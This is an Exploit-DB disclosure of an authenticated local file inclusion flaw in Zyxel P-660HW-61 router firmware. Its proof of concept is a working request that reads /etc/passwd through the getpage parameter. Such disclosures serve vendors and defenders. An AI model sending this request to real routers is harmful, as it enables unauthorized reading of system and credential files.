Zyxel P-660HW-61 Firmware < 3.40(PE.11)C0 Router - Local File Inclusion

2017-05-02T00:00:00
ID EDB-ID:41998
Type exploitdb
Reporter Exploit-DB
Modified 2017-05-02T00:00:00

Description

                                        
                                            # Exploit Title: Zyxel P-660HW-61 < 3.40(PE.11)C0 - Local File Inclusion
# Date: 2-05-2017
# Exploit Author: ReverseBrain
# Contact: https://www.twitter.com/ReverseBrain
# Vendor Homepage: https://www.zyxel.com
# Software Link: ftp://ftp.zyxel.com/P-660HW-61/firmware/P-660HW-61_3.40(PE.11)C0.zip
# Version: 3.40(PE.11)C0

1. Description

Any user who can login into the router can exploit the Local File Inclusion
reading files stored inside the device.

2. Proof of Concept

Login into the router and use the path of a file you want to read as
getpage parameter. For example:

http://ROUTER_IP/cgi-bin/webcm?getpage=/etc/passwd